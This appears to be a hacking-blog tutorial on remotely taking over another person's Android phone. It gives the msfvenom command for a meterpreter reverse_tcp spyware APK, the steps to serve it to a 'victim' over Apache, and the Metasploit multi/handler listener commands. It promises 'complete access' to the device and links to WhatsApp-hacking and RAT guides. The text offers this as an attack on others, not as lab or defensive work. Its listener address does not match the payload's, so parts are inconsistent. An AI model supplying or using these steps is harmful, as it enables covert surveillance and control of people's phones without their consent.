Hacking Android Phone Remotely Using Metasploit!!

How To Hack Phone Using Metasploit

We will use msfvenom for creating a spyware payload and send it to victim's device. We will do it on localhost (Only on our device) If you want to do it over the internet you can do it by Port Forwarding.

First of all we are going generating the payload, we will setup a listener to Metasploit framework( From Msfconsole) . When victim download and install the apk , We can simply get a meterpreter session means we get complete access on that device. 

If you want to send payload apk to victim use apache2 server with port forwarding.

Let's Start

Generating a Payload with msfvenom

At first, go to the Kali Linux / Termux so that we may generate an spyware malicious apk file as a malicious payload. We need to find our local IP that turns out to be β€˜192.168.x.xxx’. You can also do it on public ip using port forward. 

Using msfvenom tool that will generate a payload to exploit the Android device. Type command:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.99 LPORT=4444 R> devilhacker.apk

This can take some time to generate an apk file of almost 10 thousand bytes.

Send it to victim 😜. 

Launching an Attack

Before launching attack, we need to start the apache server. Type command:

service apache2 start

And Then Sudo Password Send Devilhacker.apk From Your Pc To Victim

Explotation:

msfconsole

After The Opening msfconsole Type:

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit

When Victim Open The App You Look That Meterpreter Sessions :

Now type help for seeing what can we do!

Now We got complete accesss on that device's:πŸ˜‰

Also Read :- How to install l3mon in termux.


Thanks For Reading!!

Follow Us On Social Media.

Comments

Popular posts from this blog

How to install ADB in Termux | No Root |

How to hack WhatsApp using Termux || Termux WhatsApp Hacking ||

How To Install L3MON In Termux